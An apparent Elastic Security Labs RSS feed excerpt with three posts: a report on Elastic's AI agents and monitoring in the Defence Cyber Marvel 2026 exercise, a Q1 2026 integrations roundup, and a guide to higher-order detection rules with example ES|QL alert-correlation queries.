<p>We also built a Jira integration tool that performed semantic search across ingested helpdesk tickets, enabling GrantPT to surface relevant troubleshooting context from prior support requests. This was particularly useful for the HelpDesk Analysts, who could ask GrantPT about recurring issues and get responses grounded in actual ticket history rather than generic guidance.</p>
<p>The RBAC-tailored response behaviour came from a combination of the agent's system prompt, which instructed it to contextualise answers based on the user's role, and the underlying Elasticsearch security model. Because each tool's ES|QL query is executed within the user's security context, the agent can only surface documents accessible to the user's role. A Blue Team member asking about exercise procedures would get results scoped to their team's accessible indices, whilst a HelpDesk Analyst would see results from helpdesk-specific indices. The agent didn't need explicit role-switching logic; Elasticsearch's native document-level security handled scoping, and the agent simply worked with whatever results were returned. This is one of the things that makes Agent Builder genuinely elegant - by inheriting Elasticsearch's security model, you get RBAC-aware AI without writing a single line of authorisation code.</p>
<h3>2. REDRock - The adversary's companion</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image7.png" alt="" /></p>
<p>This agent was exclusively available to Red Teams. REDRock followed the same Agent Builder pattern, a dedicated system prompt defining its adversarial persona, bound to its own set of custom ES|QL tools querying Red Team-specific indices. These indices contained the Red Team playbooks, Tuoni C2 documentation, known system vulnerabilities within the range environment, and information about deployed services. The tool definitions mirrored the same parameterised semantic search pattern used by GrantPT, but were scoped to indices accessible only to Red Team roles. Red Team operators could query attack vectors, check for known weaknesses in target systems, and get contextual guidance on their operational plans. It was, quite frankly, like giving the attackers an extremely well-briefed operations officer.</p>
<h3>3. RefPT - The referee's tool</h3>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/image2.png" alt="" /></p>
<p>Built specifically for the White Team (the exercise referees and assessors), RefPT was bound to tools querying indices containing Blue Team reports, scenario events, and the scoring criteria. Its purpose was to ensure uniform and fair scoring across all 40+ teams. The agent's system prompt was tuned to cross-reference submitted reports against known scenario events and scoring rubrics, helping assessors identify inconsistencies or gaps. When you've got assessors evaluating dozens of teams simultaneously, having an AI that can correlate reports against a structured scoring index is genuinely transformative for consistency.</p>
<h3>Tines: AI-powered workflow automation</h3>
<p>Tines was also a consumer of the on-range AI service. Each Blue Team had a dedicated Tines instance, with Tines action connectors provisioned in their Kibana space. Tines could leverage the Bedrock-backed AI capabilities for intelligent workflow automation, such as automated alert enrichment, AI-assisted triage decisions, natural-language summaries in notification workflows, and natural-language workflow creation. The Tines connector was configured per-team with credentials stored in Vault:</p>
<pre><code>resource &quot;elasticstack_kibana_action_connector&quot; &quot;tines_bt&quot; {
  count = var.team_count

  name              = &quot;BT-${local.team_numbers[count.index]}-Tines&quot;
  connector_type_id = &quot;.tines&quot;
  space_id          = local.space_ids[count.index]

  config = jsonencode({
    url = &quot;https://tines.dsoc.${local.team_numbers[count.index]}.dcm.ex/&quot;
  })
}
</code></pre>
<h3>Ensuring compliance: Guardrails and audit</h3>
<p>Every AI interaction across all of these consumers was governed by strict AWS Bedrock Guardrails. We deployed guardrails with content filtering (hate, insults, sexual content, and violence at MEDIUM thresholds), PII protection (blocking email addresses, phone numbers, names, addresses, UK National Insurance numbers, credit card numbers, and IP addresses), topic-based filtering to prevent discussion of actual classified operations, and profanity filtering. Here's a snippet of the guardrail configuration from our Terraform:</p>
<pre><code>resource &quot;aws_bedrock_guardrail&quot; &quot;dcm5_elastic&quot; {
  name        = &quot;dcm5-prod-elastic-guardrail&quot;
  description = &quot;Guardrails for DCM5 Prod Elastic Kibana GenAI connectors&quot;

  content_policy_config {
    filters_config {
      input_strength  = &quot;MEDIUM&quot;
      output_strength = &quot;MEDIUM&quot;
      type            = &quot;HATE&quot;
    }
    # ... additional content filters for INSULTS, SEXUAL, VIOLENCE
  }

  sensitive_information_policy_config {
    pii_entities_config {
      action = &quot;BLOCK&quot;
      type   = &quot;UK_NATIONAL_INSURANCE_NUMBER&quot;
    }
    pii_entities_config {
      action = &quot;BLOCK&quot;
      type   = &quot;IP_ADDRESS&quot;
    }
    # ... additional PII filters
  }

  topic_policy_config {
    topics_config {
      name       = &quot;classified-information&quot;
      definition = &quot;Discussions about actual classified operations, current real-world military activities, or operational intelligence.&quot;
      type       = &quot;DENY&quot;
    }
  }
}
</code></pre>
<p>Each Blue Team space had its own IAM user for Bedrock access, and the <code>genAiSettings:defaultAIConnectorOnly</code> Kibana setting was enforced to prevent teams from configuring their own connectors. This meant every single API call could be traced back to a specific team via CloudWatch, and the NSOC had complete audit visibility. The CloudWatch log group <code>/aws/bedrock/grantpt-prod/invocations</code> captured every invocation and guardrail event.</p>
<p>The numbers for all AI consumers speak for themselves: 3 custom AI Agents, 2,797 conversations, and 785 million AI tokens consumed throughout the exercise.</p>
<h2>In-game real-time monitoring</h2>
<p>Within the exercise scenario, each team had access to RocketChat as their on-range messaging client. Every Blue Team got its own channel, the ability to direct message anyone in the exercise, and the freedom to spin up new channels as needed. Most critically for DCM tradition, this included the memes channel - the spiritual backbone of all inter-team ribbing and the creative morale-boosting humour that inevitably emerges when you put a few thousand cyber operators under pressure for a week.</p>
<p>All of this communication data represented a brilliant real-time window into range health, team sentiment, and the topics trending across the exercise. It felt too good to pass up, so we ingested the entire RocketChat conversation corpus into Elastic in real time and put it to work.</p>
<h3>Sentiment analysis and named entity recognition</h3>
<p>For named entity recognition, we deployed the <a href="https://huggingface.co/dslim/bert-base-NER">dslim/bert-base-NER</a> model from Hugging Face into a machine learning node on the NSOC deployment using the <a href="https://www.elastic.co/guide/en/elasticsearch/client/eland/current/index.html">Elastic ELAND client</a>. This was then wired into an Elasticsearch ingest pipeline that every RocketChat message passed through on ingestion. We took the extracted entities and surfaced the most common ones as dashboard themes, giving us a live view of the ebb and flow of conversation topics throughout the exercise.</p>
<p>We also analysed group activity, user statistics, and general communication patterns to build a picture of life patterns for each team - most active participants, message volume over time, and sentiment trends pivoted by individual users. All told, it gave us some genuinely interesting insight into what was happening on the range in near real time. When we switched Elastic Agent into Prevent mode, for instance, a word cloud on our dashboard immediately lit up with &quot;Elastic&quot; as the most discussed theme across all channels - Blue Teams discussing its effectiveness, Red Teams lamenting their lost beacons. Rather satisfying, that.</p>
<h3>Meme analysis (yes, really)</h3>
<p>Finally - and this one raised a few eyebrows - we pulled every meme submitted to the channels, vectorised the images, and ran nearest-neighbour evaluations to cluster similar memes and topics together. We also passed them through the zero-shot NER inference model to generate thematic descriptions of each meme's content. The logic was that these outputs might prove useful later for filtering, moderation, or other in-game interactions. Whether the meme analysis yielded operationally critical intelligence is debatable. Whether it was good fun is not.</p>
<h2>Nipping problems in the bud</h2>
<p>As much as we hoped everything would run smoothly during exercise week, things inevitably break, aren't fully understood, or need further customisation to suit how a particular team wants to use them. For this, we had our own subsection of the in-range helpdesk where Elastic and GenAI-specific requests could be raised by any team.</p>
<p>We manned this helpdesk for the entire duration of the exercise, providing guidance, documentation, issue debugging, and range-specific recommendations. That last point is worth expanding on. Sometimes, what a Blue Team was seeing in Elastic wasn't actually an Elastic problem at all, but rather Elastic faithfully surfacing something on the range that warranted further investigation (Red Teams can cause absolute mayhem, and the telemetry doesn't lie). Over the course of the exercise, we covered 125 individual support requests from teams specifically asking for help from us at Elastic.</p>
<h3>Pre-emptive debugging with Tines</h3>
<p>Beyond visiting teams via VTC or in person at EXCON, we also worked with <a href="https://www.tines.com/partners/elastic-security/">Tines</a> to try something a bit more proactive. We pulled the ticket body from incoming requests, attempted to categorise the problem, ran the categorisation against our corpus of previously resolved tickets, and had GenAI produce a summarised first-pass response aimed at solving the user's issue before triage brought it to our queue.</p>
<p>This is actually a pattern we borrowed from our own <a href="https://www.elastic.co/blog/elastic-wins-2025-best-use-of-ai-for-assisted-support">support organisation at Elastic</a>, where we provide a similar capability using our extensive knowledge base of previously solved issues as a repository for supporting AI Agent context. The idea is straightforward: use past solutions to give a machine-generated, informed first stab at resolving a problem, and short-circuit the need for a support engineer to pick up every ticket manually. It didn't solve everything; some issues genuinely needed a human with range context, but it meaningfully reduced the queue pressure and got faster answers to the teams who needed them. This was such a success with our own specific tickets and queue that we actually extended the remit to the entire helpdesk in the latter part of the exercise, helping to reduce the load on the other groups in the Green team supporting the exercise.</p>
<h2>Industry partnerships: Better together</h2>
<p>One of the things we're most proud of is how our partnership ecosystem has grown year on year. DCM is not just an Elastic show; it's a genuine coalition of industry partners, each bringing something unique to the security platform.</p>
<p><strong>Year 1 (DCM2)</strong> - Elastic joined as an industry partner, providing the security monitoring and endpoint detection platform.</p>
<p><strong>Year 2 (DCM3)</strong> - We brought in Endace, providing 1:1 packet capture capability. Full packet capture alongside Elastic's network visibility gave teams the ability to conduct deep-dive forensics that log-based analysis alone can't provide.</p>
<p><strong>Year 3 (DCM4)</strong> - Tines joined the family, bringing workflow automation to the table. Blue Teams could now build automated response playbooks, triage workflows, and notification chains, all integrated directly into their Elastic environment via the native Tines connector.</p>
<p><strong>Year 4 (DCM26, formerly DCM5)</strong> - AWS came on board, providing Bedrock access for our AI agents and contributing funding towards the Elastic deployments. This was a significant milestone; having a hyperscaler directly invested in the exercise's success unlocked capabilities (such as compliant, UK-tenanted AI inference with full guardrails and audit logging) that simply wouldn't have been possible otherwise. Tines' integration this year was also enhanced by the addition of on-range access to LLMs. The DCM series also reached a milestone this year, transitioning from its origins as an Army Cyber Association initiative to an officially funded programme under Cyber and Specialist Operations Command.</p>
<p><strong>To the teams at Endace, Tines, and AWS - sincere thanks. This exercise is better because of your contributions, and all Teams are better equipped because of the platform we've built together. We're already planning for DCM27. Cheers to the lot of you.</strong></p>
<h2>Culture, highlights, and the bits that make it worthwhile</h2>
<h3>The Challenge Coins</h3>
<p>We had custom challenge coins minted for DCM26. If you know, you know, challenge coins are a long-standing military tradition, and having one made for the exercise felt like the right way to mark our fourth year of involvement.</p>
<h3>The cocktail party</h3>
<p>We were also grateful to be invited to the High Commission cocktail party hosted by the British High Commissioner to Singapore. There's something quite surreal about discussing Elasticsearch shard counts and Terraform state management whilst holding a gin and tonic at the ambassador's invitation. It was a brilliant evening, a genuine reminder that these exercises exist at the intersection of technology and diplomacy, and that the relationships built here extend well beyond the technical.</p>
<h2>Wrapping up</h2>
<p>The multi-tenanted architecture proved itself under sustained load; the native Elastic AI features (<a href="https://www.elastic.co/elasticsearch/ai-assistant">AI Assistant</a> and <a href="https://www.elastic.co/docs/solutions/security/ai/attack-discovery">Attack Discovery</a>) gave teams capabilities that would have been science fiction a few years ago; and the custom AI agents exceeded our expectations for adoption. The partnership model continues to demonstrate that industry involvement in defence exercises creates outcomes that no single organisation could achieve alone.</p>
<p>Defence Cyber Marvel 2026 was a landmark iteration of an exercise that continues to grow in ambition, complexity, and impact. For Elastic, being trusted to provide the core defensive security platform for 40 Blue Teams from 29 nations, and this year, the AI capability as well, is something we don't take lightly. The exercise develops real skills for real people who will go on to defend real networks, and being a part of that mission is genuinely meaningful.</p>
<p>As the <a href="https://www.gov.uk/government/news/uk-to-lead-multinational-cyber-defence-exercise-from-singapore">UK Government's press release</a> put it, DCM demonstrates the practical value of real-life scenarios that reinforce international partnerships. We couldn't agree more.</p>
<p>We'll be back next year, and I suspect we'll have even more to talk about. In the meantime, we'll continue to improve the product so that support for environments such as Defence Cyber Marvel excels year over year.</p>
<p>See you on the range.</p>
<p>Follow the DCM26 story on social media:</p>
<p><a href="https://www.facebook.com/RSIGNALS/posts/last-week-defence-cyber-marvel-2026-based-in-singapore-brought-together-2500-par/1338105391677347/">Facebook</a> | <a href="https://www.linkedin.com/posts/uk-in-singapore_defence-cyber-marvel-2026pdf-activity-7426505462310752258-1aHq?utm_source=share&amp;utm_medium=member_desktop&amp;rcm=ACoAABiQ31MBIbDwn5LYMrolM4rznGQcLabrY9A">LinkedIn</a> | <a href="https://www.instagram.com/p/DU00Y1jCKbr/">Instagram</a></p>
<h2>Further reading</h2>
<p><em>Elastic Security &amp; AI</em></p>
<ul>
<li><a href="https://www.elastic.co/security-labs">Elastic Security</a> - The platform powering the Blue Team deployments</li>
<li><a href="https://www.elastic.co/elasticsearch/ai-assistant">AI Assistant for Security</a> - Context-aware AI chat within Elastic Security</li>
<li><a href="https://www.elastic.co/docs/solutions/security/ai/attack-discovery">Attack Discovery</a> - LLM-powered alert correlation and threat narrative generation</li>
<li><a href="https://www.elastic.co/docs/explore-analyze/ai-features/elastic-agent-builder">Agent Builder</a> - Framework for building custom AI agents with Elasticsearch</li>
</ul>
<p><em>Infrastructure &amp; Tooling</em></p>
<ul>
<li><a href="https://registry.terraform.io/providers/elastic/elasticstack/latest/docs">Elastic Stack Terraform Provider</a> - Infrastructure as Code for the Elastic Stack</li>
<li><a href="https://www.elastic.co/docs/reference/fleet">Elastic Fleet Guide</a> - Centrally managing Elastic Agents at scale</li>
<li><a href="https://github.com/ClarifiedSecurity/catapult">Catapult by Clarified Security</a> - Ansible-based cyber range provisioning</li>
</ul>
<p><em>Exercise Context</em></p>
<ul>
<li><a href="https://www.gov.uk/government/news/uk-to-lead-multinational-cyber-defence-exercise-from-singapore">UK Government DCM26 Press Release</a> - Official overview of the exercise</li>
</ul>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/elastic-defence-cyber-marvel/elastic-defence-cyber-marvel.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Elastic Security Integrations Roundup: Q1 2026]]></title>
            <link>https://www.elastic.co/security-labs/elastic-security-integrations-roundup-q1-2026</link>
            <guid>elastic-security-integrations-roundup-q1-2026</guid>
            <pubDate>Sat, 04 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs announces nine new integrations for Elastic Security spanning cloud security, endpoint visibility, email threat detection, identity and SIEM.]]></description>
            <content:encoded><![CDATA[<h2>A quarterly look at Elastic’s security integrations ecosystem</h2>
<p>Security teams can only protect what they can see. Gaps in coverage, like a macOS fleet generating logs that never reach your SIEM, an email gateway running in isolation, or a cloud environment producing findings that stay siloed in the vendor console, are easily exploited by attackers.</p>
<p>Elastic’s answer to this is continuous and open investment in third-party integrations, built on the belief that a strong security ecosystem requires deep integrations that make data from every corner of the stack searchable and contextualized. Today, we’re announcing nine new integrations for Elastic Security spanning cloud security, endpoint visibility, email threat detection, identity and SIEM.</p>
<p>Each integration ships with ingest pipelines that normalize and structure data out of the box, along with prebuilt dashboards that serve as an immediate starting point for visualization and analysis, so teams can search, correlate and investigate across new data sources from day one without writing or maintaining parsers.</p>
<h2>macOS Security Events</h2>
<p>Elastic Defend, the native integration that delivers Elastic Endpoint Security, collects rich security telemetry on macOS, and it is intentionally focused on high-value detection signals rather than full system auditing. Login and logout events, account creation and deletion, service registration changes and application diagnostic logs all live outside that scope, leaving threat hunters and IR teams without complete macOS context. The macOS Security Events integration complements Elastic Defend, providing the same depth of OS-level visibility offered to Windows devices via the Windows Event Logs integration.</p>
<p>MacOS endpoints generate tens of thousands of unified log entries per endpoint. Left unfiltered, that volume creates noise rather than signals. This integration ships with predicate-based filters that scope ingestion to security-relevant events: authentication activity, process execution, network connections, file system changes, and system configuration modifications.</p>
<p>These predicate-based filters enable comprehensive macOS coverage without the cost or complexity of ingesting everything. Once ingested, these events are immediately available to Elastic Security’s AI Assistant. Analysts can ask natural-language questions like &quot;Show me all privilege escalation attempts on macOS endpoints in the last 24 hours&quot; or &quot;Summarize login failures for this host”, turning raw unified log entries into actionable investigation context without writing a single query.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/macos">macOS Security Events</a> integration.</p>
<h2>IBM QRadar</h2>
<p>For teams running IBM QRadar in parallel with Elastic Security, alert ingestion into Elastic has become easier. The QRadar integration collects offense records from QRadar’s offense and rules endpoints, enriching each alert with the triggering rule’s name, ID, type and ownership, so analysts can triage in Elastic without switching back to QRadar.</p>
<p>This integration is the foundation of Elastic’s SIEM migration workflow for QRadar, which mirrors the capability already available for <a href="https://www.elastic.co/docs/reference/integrations/splunk">Splunk</a>. Teams can also use <a href="https://www.elastic.co/security-labs/from-qradar-to-elastic">Automatic Migration</a> for migrating their QRadar rules into Elastic. It uses semantic search and generative AI to map existing rules to Elastic’s 1,300+ prebuilt detections, and translates anything that doesn’t map directly into ES|QL, allowing you to consolidate your SIEM footprint without manually rebuilding your entire detection library.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/ibm_qradar">IBM QRadar</a> integration.</p>
<h2>Proofpoint Essentials</h2>
<p>For Enterprise customers, Proofpoint’s TAP (Targeted Attack Protection) has been available in Elastic. To provide the same email threat visibility to SMB environments and the MSP and MSSPs who serve them, Proofpoint Essentials is now available.</p>
<p>The Proofpoint Essentials integration streams four event types into Elastic Security:</p>
<ul>
<li>Clicks on malicious URLs that were blocked</li>
<li>Clicks that were permitted</li>
<li>Messages blocked for containing threats recognized by URL Defense or Attachment Defense</li>
<li>Messages delivered despite containing those threats</li>
</ul>
<p>To easily surface this data, two prebuilt dashboards are available:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-integrations-roundup-q1-2026/image2.png" alt="Clicks Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." title="Clicks Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/elastic-security-integrations-roundup-q1-2026/image1.png" alt="Threat Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." title="Threat Overview dashboard shows blocked versus permitted click trends over time, broken down by threat status and classification." /></p>
<p>For an SMB SOC team, this means phishing attempts, malware detections and policy violations land in the same platform as the rest of your security telemetry, removing the need to switch platforms to understand the full context of a threat.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/proofpoint_essentials">Proofpoint Essentials</a> integration.</p>
<h2>AWS Security Hub</h2>
<p>AWS Security Hub aggregates findings across your AWS environment, but investigating those findings means staying inside the AWS console, separate from the rest of your team’s security data. The Elastic integration changes this by pulling Security Hub findings into Elastic in Open Cybersecurity Schema Framework (OCSF) format and normalizing them to ECS, offering schema-consistent data that’s immediately searchable via ES|QL.</p>
<p>Findings land in the <a href="https://www.elastic.co/docs/solutions/security/cloud/findings-page-3">Elastic Vulnerability Findings</a> page, integrating AWS cloud security posture directly into the workflows already in place. From there, you can correlate Security Hub data with signals from other sources - endpoint alerts, identity events, network telemetry - to build a fuller picture of risk across your AWS environment and investigate faster than the native console allows.</p>
<p>Check out the <a href="https://www.elastic.co/docs/reference/integrations/aws_securityhub">AWS Security Hub</a> integration.</p>
<h2>More new Elastic Security integrations</h2>
<p>In addition to the featured integrations above, the following integrations are now available, each shipping with prebuilt dashboards for immediate value:</p>
<ul>
<li><a href="https://www.elastic.co/docs/reference/integrations/jupiter_one">JupiterOne</a>: Asset intelligence and cloud attack surface monitoring, ingesting cross-tool alerts, CVE findings, and threat detections enriched with MITRE ATT&amp;CK mappings and CVSS scores, and host context for unified risk visibility.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/airlock_digital">Airlock Digital</a>: Application allowlisting and execution control telemetry, capturing blocked process executions with command lines, file hashes and publisher context, so unauthorized execution attempts are visible and correlatable alongside the rest of your endpoint detections.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/island_browser">Island Browser</a>: Enterprise browser security events spanning user navigation, device posture, compromised credential detection and admin activity, extending Elastic’s visibility to BYOD and unmanaged devices where traditional endpoint agents can’t be deployed.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/ironscales">Ironscales</a>: AI-powered phishing detection events capturing email metadata, sender reputation, affected mailbox counts and suspicious links, correlatable with endpoint and identity data for faster investigation and response.</li>
<li><a href="https://www.elastic.co/docs/reference/integrations/cyera">Cyera</a>: Data security posture management events, surfacing sensitive data risks including exposure severity, affected record counts, compliance framework violations, and datastore ownership across cloud environments, so sensitive data exposure doesn’t stay siloed in a separate DSPM console.</li>
</ul>
<h2>Get started</h2>
<p>These integrations Elastic’s open approach to security. All nine integrations in this roundup ship with prebuilt dashboards and native ECS mappings, giving your team immediate visibility with no additional setup or custom visualization work required.</p>
<p>From there, findings, alerts and logs are immediately available to Elastic’s broader <a href="https://www.elastic.co/docs/solutions/security/ai/identify-investigate-document-threats">detection and investigation capabilities</a>: Attack Discovery for surfacing multi-stage threats, AI Assistant for natural-language investigation and guided response, and to ES|QL and EQL for custom detection and hunting queries.</p>
<ul>
<li><a href="https://www.elastic.co/integrations/data-integrations?solution=security">Browse available integrations</a></li>
<li><a href="https://www.elastic.co/blog/automatic-migration-ai-rule-translation">Learn about migrating to Elastic Security from other SIEMs</a></li>
</ul>
<p>Have questions or feedback? Join #security-siem in the <a href="https://www.elastic.co/community/">Elastic Stack Community Slack</a>.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/security-labs/assets/images/elastic-security-integrations-roundup-q1-2026/elastic-security-integrations-roundup-q1-2026.webp" length="0" type="image/webp"/>
        </item>
        <item>
            <title><![CDATA[Prioritizing Alerts Triage with Higher-Order Detection Rules]]></title>
            <link>https://www.elastic.co/security-labs/higher-order-detection-rules</link>
            <guid>higher-order-detection-rules</guid>
            <pubDate>Thu, 02 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Scaling SOC efficiency through multi-signal correlation and higher-order detection patterns.]]></description>
            <content:encoded><![CDATA[<p>At Elastic, we operate a large and diverse set of behavior detection rules across multiple datasets, environments, and severity levels. Most of these rules are atomic, each designed to detect a specific behavior, signal, or attack pattern. In addition, we ingest and promote <a href="https://github.com/elastic/detection-rules/tree/main/rules/promotions">external alerts</a> from security integrations such as firewalls, EDR, WAF, and other security controls.</p>
<p>The result is powerful visibility but also significant alert volume. From our telemetry, even when considering only non <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/about-building-block-rules">Building Block Rules</a>, <strong>65</strong> unique detection rules generate nearly <strong>8000 alerts per day per production cluster</strong>. Analyzing each alert in isolation is neither scalable nor cost-effective.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image6.png" alt="" /></p>
<p>This is where <strong>Higher-Order Rules</strong> come into play.</p>
<p><a href="https://github.com/search?q=repo%3Aelastic%2Fdetection-rules++%22Rule+Type%3A+Higher-Order+Rule%22+path%3A%2F%5Erules%5C%2F%2F&amp;type=code">Higher-order</a> rules do not detect a single behavior. Instead, they correlate related alerts over time, across data sources, or within a shared context (such as host, user, IP, or process). By grouping signals into meaningful patterns, we can prioritize what truly matters and reduce the need for deep, expensive analysis on every individual alert whether performed manually, automated, or augmented by AI.</p>
<p>In this blog, we’ll walk through our approach to building Higher-Order Rules in Elastic, share practical examples, and highlight key lessons learned along the way.</p>
<h2>What Are Higher-Order Rules?</h2>
<p>Higher-Order Rules (HOR) are detections that use <strong>alerts as input</strong>, either correlating alerts with other alerts (alert-on-alert) or combining alerts with additional data such as raw events, metrics, or contextual telemetry.</p>
<p>Unlike atomic rules that detect a single behavior, Higher-Order Rules identify patterns across signals. Their purpose is not to replace base detections, but to elevate combinations of findings that are more likely to represent real attack activity. In practice, they surface higher-confidence findings and improve triage prioritization. Higher-Order rules are designed to work alongside <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/about-building-block-rules">Building Block Rules</a>. Building block rules generate alerts that do not appear in the default alerts view, reducing noise while still feeding correlated detections. Many of the base rules referenced in this article can be also configured as building block rules, so that only Higher-Order correlations surface for analyst review.</p>
<p>The core insight is that independent detections converging on the same entity compound confidence, where each additional signal multiplies the likelihood that the activity is real, not benign.These three design principles operationalize that insight:</p>
<h3>1. Entity-Based Correlation</h3>
<p>Rules correlate activity by shared entities such as host, user, source IP, destination IP, or process - allowing analysts to quickly see when multiple findings converge on the same asset or identity.</p>
<h3>2. Cross–Data Source Visibility</h3>
<p>Some rules operate within a single integration (for example, endpoint-only detections from Elastic Defend or third-party EDR). Others intentionally combine signals across domains endpoint with network (PANW, FortiGate, Suricata), endpoint with email, or endpoint with system metrics to capture multi-stage or cross-surface activity.</p>
<h3>3. Time and Prevalence Awareness</h3>
<p>Temporal logic plays a key role.</p>
<p>Newly observed rules highlight the first occurrence of a given alert within a defined lookback window (for example, five days), ensuring that even a single rare alert is surfaced for review.</p>
<p>Prevalence-based logic (such as using INLINE STATS) filters for alerts that occur on only a small number of hosts globally, helping reduce noise and emphasize anomalous behavior.</p>
<p>The full set of Higher-Order Rules spans endpoint-only correlations, cross-domain detections (endpoint + network, endpoint + email), lateral movement patterns (for example, <code>alert_1 host.ip = alert_2 source.ip</code>), ATT&amp;CK-aligned groupings (single or multi-tactic activity), newly observed alerts, and alert-to-event correlation (such as alerts combined with abnormal CPU metrics). The following sections walk through representative examples from these categories.</p>
<h2>Correlation and Newly Observed Higher-Order Rules</h2>
<p>In practice, high-risk activity does not always look the same.</p>
<p>Sometimes compromise reveals itself through <strong>multiple converging signals</strong>. Other times, it appears as a <strong>single alert that has never been seen before</strong>.</p>
<p>To handle both realities, we organize our Higher-Order Rules into three complementary patterns:</p>
<ul>
<li><strong>Correlation rules</strong> multiple alerts or events linked to a shared entity (host, user, IP, or process).</li>
<li><strong>Newly observed rules</strong> a single alert that is rare or first-seen within a defined time window.</li>
<li><strong>Hybrid patterns</strong> combining correlation with first-seen logic, which can further elevate suspicion and surface particularly interesting activity.</li>
</ul>
<p>Correlation rules raise confidence through signal density and diversity: when several independent detections point to the same entity, the likelihood of real malicious activity increases.</p>
<p>Newly observed rules address the opposite case, low volume but high novelty. They prioritize alerts based on rarity over time, ensuring that first-time or highly unusual detections are not overlooked simply because they occur once.</p>
<p>Together, these approaches form the foundation of an efficient and scalable triage strategy.</p>
<p>Let’s dive into examples and explore the differences, strengths, and trade-offs of each pattern.</p>
<h3>Endpoint Alerts Correlation</h3>
<p>A significant portion of real-world attack discovery comes from endpoint telemetry. It provides rich context process activity, command lines, file behavior, and user actions making it one of the most powerful detection sources.</p>
<p>At the same time, endpoint environments are dynamic. Legitimate software, admin tools, and third-party applications (and recently GenAI endpoint utilities 🥲) can generate high alert volume and false positives, requiring continuous tuning.</p>
<p>Higher-Order correlation helps address this by shifting the focus from individual alerts to <strong>multiple distinct signals on the same host or process</strong> increasing confidence while reducing unnecessary investigation effort.</p>
<p>The following ES|QL query triggers when there are 3 unique Elastic Defend behavior rules OR alerts from different features (e.g. one shellcode_thread with behavior, malicious_file with behavior) OR more than 2 malware alerts in a 24h time Window from the same host:</p>
<pre><code>from logs-endpoint.alerts-* metadata _id
| eval day = DATE_TRUNC(24 hours, @timestamp)
| where event.code in (&quot;malicious_file&quot;, &quot;memory_signature&quot;,  &quot;shellcode_thread&quot;, &quot;behavior&quot;) and 
 agent.id is not null and not rule.name in (&quot;Multi.EICAR.Not-a-virus&quot;)
| stats Esql.alerts_count = COUNT(*),
        Esql.event_code_distinct_count = count_distinct(event.code),
        Esql.rule_name_distinct_count = COUNT_DISTINCT(rule.name),
        Esql.file_hash_distinct_count = COUNT_DISTINCT(file.hash.sha256),
        Esql.process_entity_id_distinct_count = COUNT_DISTINCT(process.entity_id) by host.id, day
| where (Esql.event_code_distinct_count &gt;= 2 or Esql.rule_name_distinct_count &gt;= 3 or Esql.file_hash_distinct_count &gt;= 2)
</code></pre>
<p>To further raise suspicion, we can also correlate Elastic Defend alerts that belong to the same process tree:</p>
<pre><code>from logs-endpoint.alerts-*
| where event.code in (&quot;malicious_file&quot;, &quot;memory_signature&quot;, &quot;shellcode_thread&quot;, &quot;behavior&quot;) and
        agent.id is not null and not rule.name in (&quot;Multi.EICAR.Not-a-virus&quot;) and process.Ext.ancestry is not null

// aggregate alerts by process.Ext.ancestry and agent.id
| stats Esql.alerts_count = COUNT(*),
        Esql.rule_name_distinct_count = COUNT_DISTINCT(rule.name),
        Esql.event_code_distinct_count = COUNT_DISTINCT(event.code),
        Esql.process_id_distinct_count = COUNT_DISTINCT(process.entity_id),
        Esql.message_values = VALUES(message),
   ... by process.Ext.ancestry, agent.id

// filter for at least 3 unique process IDs and 2 or more alert types or rule names.
| where Esql.process_id_distinct_count &gt;= 3 and (Esql.rule_name_distinct_count &gt;= 2 or Esql.event_code_distinct_count &gt;= 2)

// keep unique values
| stats Esql.alert_names = values(Esql.message_values),
        Esql.alerts_process_cmdline_values = VALUES(Esql.process_command_line_values),
... by agent.id
| keep Esql.*, agent.id
</code></pre>
<p>Example of matches:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/higher-order-detection-rules/image9.png" alt="" /></p>
<p>To complement our coverage, we will need to also look for rare atomic ones.  The following ES|QL is designed to run on a 10-minute schedule with a 5 or 7 day lookback window. The lookback aggregates all alerts by rule name over the full window to compute first-seen time. The final filter (<code>Esql.recent &lt;= 10</code>) ensures only rules whose first-seen time falls within with current 10-minute execution window are surfaced, effectively detecting the moment a rule fires for the first time in the lookback period. This surfaces both rare false positives and stealthy behaviors that might otherwise be lost in volume:</p>
<pre><code>from logs-endpoint.alerts-*
| WHERE event.code == &quot;behavior&quot; and rule.name is not null
| STATS Esql.alerts_count = count(*),
        Esql.first_time_seen = MIN(@timestamp),
        Esql.last_time_seen = MAX(@timestamp),
        Esql.agents_distinct_count = COUNT_DISTINCT(agent.id),
        Esql.process_executable = VALUES(process.executable),
        Esql.process_parent_executable = VALUES(process.parent.executable),
        Esql.process_command_line = VALUES(process.command_line),
        Esql.process_hash_sha256 = VALUES(process.hash.sha256),
        Esql.host_id_values = VALUES(host.id),
        Esql.user_name = VALUES(user.name) by rule.name
// first time seen in the last 5 days - defined in the rule schedule Additional look-back time
| eval Esql.recent = DATE_DIFF(&quot;minute&quot;, Esql.first_time_seen, now())
// first time seen is within 10m of the rule execution time
| where Esql.recent &lt;= 10 and Esql.agents_distinct_count == 1 and Esql.alerts_count &lt;= 10 and (Esql.last_time_seen == Esql.first_time_seen)
// Move single values to their corresponding ECS fields for alerts exclusion
| eval host.id = mv_min(Esql.host_id_values)
| keep host.id, rule.name, Esql.*
</code></pre>
